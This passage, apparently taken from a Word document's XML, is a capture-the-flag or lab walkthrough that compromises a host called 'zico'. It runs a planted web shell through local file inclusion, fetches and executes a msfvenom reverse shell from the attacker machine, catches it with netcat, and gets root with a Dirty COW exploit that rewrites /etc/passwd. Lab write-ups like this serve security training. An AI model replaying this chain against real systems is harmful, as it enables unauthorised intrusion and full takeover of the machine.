        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="21086116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 xml:space="preserve">root@kali:~/Desktop# curl 'http://10.0.0.19/view.php?page=../../tmp/webShell.php&amp;cmd=uname+-a' | html2text </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59815BC9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 xml:space="preserve">  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52AB2335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 xml:space="preserve">                                 Dload  Upload   Total   Spent    Left  Speed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A728565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100   113  100   113    0     0  23289      0 --:--:-- --:--:-- --:--:-- 28250</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66741EB3" w14:textId="77777777" w:rsidR="00DB4F1B" w:rsidRP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Linux zico 3.2.0-23-generic #36-Ubuntu SMP Tue Apr 10 20:39:51 UTC 2012 x86_64</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E8167ED" w14:textId="0FCA9CE9" w:rsidR="00DB4F1B" w:rsidRDefault="00DB4F1B" w:rsidP="00DB4F1B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DB4F1B">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t>x86_64 x86_64 GNU/Linux</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AF24EFD" w14:textId="77777777" w:rsidR="00DB4F1B" w:rsidRDefault="00DB4F1B" w:rsidP="00DB4F1B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6CCD3086" w14:textId="1DD57580" w:rsidR="00DB4F1B" w:rsidRDefault="00B44AC0" w:rsidP="00DB4F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These </w:t>
      </w:r>
      <w:r w:rsidR="00AA10FC">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t>last 2 commands show that the ta</w:t>
      </w:r>
      <w:r w:rsidR="00DB4F1B">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">rget has no </w:t>
      </w:r>
      <w:r w:rsidR="000E3618">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t>firewall and running a Ubuntu 64</w:t>
      </w:r>
      <w:r w:rsidR="00DB4F1B">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> bit.  All I have to do now is </w:t>
      </w:r>
      <w:r w:rsidR="007461B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t>generate</w:t>
      </w:r>
      <w:r w:rsidR="00DB4F1B">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> a reverse shell, </w:t>
      </w:r>
      <w:r w:rsidR="007461B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">upload it, setup netcat listener and get a shell. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DADDCF8" w14:textId="4AD3811A" w:rsidR="007461B4" w:rsidRDefault="000E3618" w:rsidP="00DB4F1B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t>++++++++++++</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26C5CDDB" w14:textId="1192512B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>root@kali:</w:t>
      </w:r>
      <w:r w:rsidR="000E3618">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t>~/Desktop# msfvenom -p linux/x64</w:t>
      </w:r>
      <w:r w:rsidRPr="004254E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t>/shell_reverse_tcp LHOST=10.0.0.100 LPORT=443 CMD=/bin/bash -f elf &gt; /var/www/html/rev-10-0-0-100-443</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D770455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>No platform was selected, choosing Msf::Module::Platform::Linux from the payload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29EDE614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>No Arch selected, selecting Arch: x86 from the payload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26A065C2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>No encoder or badchars specified, outputting raw payload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="726C8ACE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>Payload size: 73 bytes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4915FE0A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>Final size of elf file: 157 bytes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BBFB38D" w14:textId="77777777" w:rsidR="004254E9" w:rsidRDefault="004254E9" w:rsidP="00DB4F1B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0FF3C333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 xml:space="preserve">root@kali:~/Desktop# curl 'http://10.0.0.19/view.php?page=../../tmp/webShell.php&amp;cmd=wget+http://10.0.0.100/rev-10-0-0-100-443+-O+/tmp/rev-443' | html2text </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15943201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 xml:space="preserve">  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="714F05DC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 xml:space="preserve">                                 Dload  Upload   Total   Spent    Left  Speed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="345813F8" w14:textId="7FA0BD48" w:rsid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>100    10  100    10    0     0    867      0 --:--:-- --:--:-- --:--:--   909</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="548A76CE" w14:textId="77777777" w:rsidR="004254E9" w:rsidRDefault="004254E9" w:rsidP="004254E9">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="64CADA91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 xml:space="preserve">root@kali:~/Desktop# curl 'http://10.0.0.19/view.php?page=../../tmp/webShell.php&amp;cmd=chmod+777+/tmp/rev-443' | html2text </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="552FE8E8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 xml:space="preserve">  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A06EC44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 xml:space="preserve">                                 Dload  Upload   Total   Spent    Left  Speed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66A2BA54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>100    10  100    10    0     0   1883      0 --:--:-- --:--:-- --:--:--  2000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BD30940" w14:textId="77777777" w:rsidR="004254E9" w:rsidRDefault="004254E9" w:rsidP="004254E9">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6B2133EF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 xml:space="preserve">root@kali:~/Desktop# curl 'http://10.0.0.19/view.php?page=../../tmp/webShell.php&amp;cmd=ls+-l+/tmp/' | html2text </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73D23602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 xml:space="preserve">  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="626ED100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 xml:space="preserve">                                 Dload  Upload   Total   Spent    Left  Speed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5054EAF4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>100   135  100   135    0     0  14246      0 --:--:-- --:--:-- --:--:-- 15000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64C67971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>total 8</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D2DC5FC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>-rwxrwxrwx 1 www-data www-data 157 Oct 22 21:55 rev-443</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50111788" w14:textId="77777777" w:rsid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>-rw-r--r-- 1 www-data www-data  67 Oct 23 01:00 webShell.php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75E440C2" w14:textId="77777777" w:rsidR="00B44AC0" w:rsidRPr="004254E9" w:rsidRDefault="00B44AC0" w:rsidP="004254E9">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3AC0A515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 xml:space="preserve">root@kali:~/Desktop# curl 'http://10.0.0.19/view.php?page=../../tmp/webShell.php&amp;cmd=/tmp/rev-443' | html2text </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B89E6F5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 xml:space="preserve">  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="446DEDB1" w14:textId="77777777" w:rsidR="004254E9" w:rsidRPr="004254E9" w:rsidRDefault="004254E9" w:rsidP="004254E9">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004254E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">                                 Dload  Upload   Total   Spent    Left  Speed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37652B4F" w14:textId="77777777" w:rsidR="004254E9" w:rsidRDefault="004254E9" w:rsidP="004254E9">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="12B93BF5" w14:textId="4BDB4933" w:rsidR="00595D6B" w:rsidRDefault="00595D6B" w:rsidP="004254E9">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t>Here comes the SHELL!!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="673DE085" w14:textId="77777777" w:rsidR="00595D6B" w:rsidRDefault="00595D6B" w:rsidP="004254E9">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4D6D2D78" w14:textId="77777777" w:rsidR="003A7A87" w:rsidRPr="003A7A87" w:rsidRDefault="003A7A87" w:rsidP="003A7A87">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003A7A87">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t>root@kali:~/Desktop# nc -lnvp 443</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7076432F" w14:textId="77777777" w:rsidR="003A7A87" w:rsidRPr="003A7A87" w:rsidRDefault="003A7A87" w:rsidP="003A7A87">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003A7A87">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t>listening on [any] 443 ...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03FC662D" w14:textId="77777777" w:rsidR="003A7A87" w:rsidRPr="003A7A87" w:rsidRDefault="003A7A87" w:rsidP="003A7A87">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003A7A87">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t>connect to [10.0.0.100] from (UNKNOWN) [10.0.0.19] 51950</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04E888D2" w14:textId="77777777" w:rsidR="003A7A87" w:rsidRPr="003A7A87" w:rsidRDefault="003A7A87" w:rsidP="003A7A87">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003A7A87">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t>python -c 'import pty;pty.spawn("/bin/bash")'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67D583CE" w14:textId="77777777" w:rsidR="003A7A87" w:rsidRPr="003A7A87" w:rsidRDefault="003A7A87" w:rsidP="003A7A87">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003A7A87">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t>www-data@zico:/var/www$ id</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="052E536D" w14:textId="77777777" w:rsidR="003A7A87" w:rsidRPr="003A7A87" w:rsidRDefault="003A7A87" w:rsidP="003A7A87">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003A7A87">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t>id</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D432B0D" w14:textId="77777777" w:rsidR="003A7A87" w:rsidRPr="003A7A87" w:rsidRDefault="003A7A87" w:rsidP="003A7A87">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003A7A87">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t>uid=33(www-data) gid=33(www-data) groups=33(www-data)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48446AFA" w14:textId="74D7833C" w:rsidR="004254E9" w:rsidRDefault="003A7A87" w:rsidP="003A7A87">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003A7A87">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t>www-data@zico:/var/www$</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3693FF2C" w14:textId="77777777" w:rsidR="00595D6B" w:rsidRDefault="00595D6B" w:rsidP="003A7A87">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="66B1060F" w14:textId="5BE8C560" w:rsidR="00595D6B" w:rsidRDefault="00595D6B" w:rsidP="003A7A87">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t>Since this is a Ubuntu ~12.0 its very likely it’ll be vulnerable to one of the dirty cow exploit (dirty copy on write).  So I’m going to try one of the variation I found in exploit DB.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17E1985C" w14:textId="77777777" w:rsidR="00595D6B" w:rsidRDefault="00595D6B" w:rsidP="003A7A87">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0D9DFE7A" w14:textId="77777777" w:rsidR="00595D6B" w:rsidRPr="00595D6B" w:rsidRDefault="00595D6B" w:rsidP="00595D6B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00595D6B">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t>root@kali:~/Desktop/linuxRoot# gcc -pthread dirty.c -o dirty -lcrypt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="013851AF" w14:textId="77777777" w:rsidR="00595D6B" w:rsidRPr="00595D6B" w:rsidRDefault="00595D6B" w:rsidP="00595D6B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00595D6B">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t>root@kali:~/Desktop/linuxRoot# ls -l</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68A2655D" w14:textId="77777777" w:rsidR="00595D6B" w:rsidRPr="00595D6B" w:rsidRDefault="00595D6B" w:rsidP="00595D6B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00595D6B">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t>total 32</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="391782DE" w14:textId="77777777" w:rsidR="00595D6B" w:rsidRPr="00595D6B" w:rsidRDefault="00595D6B" w:rsidP="00595D6B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00595D6B">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t>-rwxr-xr-x 1 root root 14368 Oct 24 23:27 dirty</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56045B09" w14:textId="77777777" w:rsidR="00595D6B" w:rsidRPr="00595D6B" w:rsidRDefault="00595D6B" w:rsidP="00595D6B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00595D6B">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t>-rw-r--r-- 1 root root  5006 Aug 18 23:15 dirty.c</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="002540B0" w14:textId="77777777" w:rsidR="00595D6B" w:rsidRPr="00595D6B" w:rsidRDefault="00595D6B" w:rsidP="00595D6B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00595D6B">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t>-rw-r--r-- 1 root root  4957 Oct 24 23:23 dirtyCow.c</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A3DAE52" w14:textId="302F604D" w:rsidR="00595D6B" w:rsidRDefault="00595D6B" w:rsidP="00595D6B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00595D6B">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t>root@kali:~/Desktop/linuxRoot# mv ./dirty /var/www/html/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30426DCD" w14:textId="77777777" w:rsidR="00595D6B" w:rsidRDefault="00595D6B" w:rsidP="003A7A87">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5E8189B4" w14:textId="77777777" w:rsidR="00886200" w:rsidRDefault="00886200" w:rsidP="00D36760">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t>Now on target machine</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71B29ED5" w14:textId="77777777" w:rsidR="00886200" w:rsidRDefault="00886200" w:rsidP="00D36760">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="274229BF" w14:textId="2A8CAC16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www-data@zico:/var/www$ cd /tmp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EFFD511" w14:textId="5FE41050" w:rsidR="00400BD5" w:rsidRDefault="00D36760" w:rsidP="003A7A87">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t>cd /tmp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15CFCC7C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www-data@zico:/tmp$ wget http://10.0.0.100/dirty</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FE462F3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wget http://10.0.0.100/dirty</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57B4DD11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--2017-10-25 03:27:51--  http://10.0.0.100/dirty</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5091B861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Connecting to 10.0.0.100:80... connected.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="015B4DF7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HTTP request sent, awaiting response... 200 OK</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26CA9F59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Length: 14368 (14K)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="464FF006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Saving to: `dirty'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03B80198" w14:textId="77777777" w:rsidR="00D36760" w:rsidRPr="00D36760" w:rsidRDefault="00D36760" w:rsidP="00D36760">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4521D320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 xml:space="preserve">100%[======================================&gt;] 14,368      --.-K/s   in 0s      </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DAD413A" w14:textId="77777777" w:rsidR="00D36760" w:rsidRPr="00D36760" w:rsidRDefault="00D36760" w:rsidP="00D36760">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3AAC164D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2017-10-25 03:27:51 (210 MB/s) - `dirty' saved [14368/14368]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76E065B4" w14:textId="77777777" w:rsidR="00D36760" w:rsidRPr="00D36760" w:rsidRDefault="00D36760" w:rsidP="00D36760">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="63FA4C98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www-data@zico:/tmp$ chmod +x ./dirty</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14596080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chmod +x ./dirty</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="220572EB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www-data@zico:/tmp$ ./dirty password</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46165B5E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./dirty password</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62BBEF40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/etc/passwd successfully backed up to /tmp/passwd.bak</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ED65CBD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Please enter the new password: password</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60B0AD7A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Complete line:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74FC13F5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firefart:fi1IpG9ta02N.:0:0:pwned:/root:/bin/bash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05969AC3" w14:textId="77777777" w:rsidR="00D36760" w:rsidRPr="00D36760" w:rsidRDefault="00D36760" w:rsidP="00D36760">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7DBBEEF2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mmap: 7ffad8107000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DCABE64" w14:textId="77777777" w:rsidR="00D36760" w:rsidRPr="00D36760" w:rsidRDefault="00D36760" w:rsidP="00D36760">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D36760">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t>madvise 0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="779DC357" w14:textId="77777777" w:rsidR="00400BD5" w:rsidRDefault="00400BD5" w:rsidP="003A7A87">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="073EC963" w14:textId="77777777" w:rsidR="00C042D4" w:rsidRDefault="00D36760" w:rsidP="003A7A8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So this dirty cow privilege escalate version worked, and I should be able to login with </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B52C7DF" w14:textId="0EC09E8E" w:rsidR="00D36760" w:rsidRDefault="00D36760" w:rsidP="003A7A8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firefart:password as root </w:t>
      </w:r>
      <w:r w:rsidRPr="00D36760">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:sym w:font="Wingdings" w:char="F04A"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A5BDC75" w14:textId="77777777" w:rsidR="00400BD5" w:rsidRDefault="00400BD5" w:rsidP="003A7A87">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0E4754E9" w14:textId="77777777" w:rsidR="00400BD5" w:rsidRPr="00400BD5" w:rsidRDefault="00400BD5" w:rsidP="00400BD5">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00400BD5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t>root@kali:~/Desktop/linuxRoot# ssh firefart@10.0.0.19</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61912B69" w14:textId="77777777" w:rsidR="00400BD5" w:rsidRPr="00400BD5" w:rsidRDefault="00400BD5" w:rsidP="00400BD5">
      <w:pPr>
        <w:rPr>
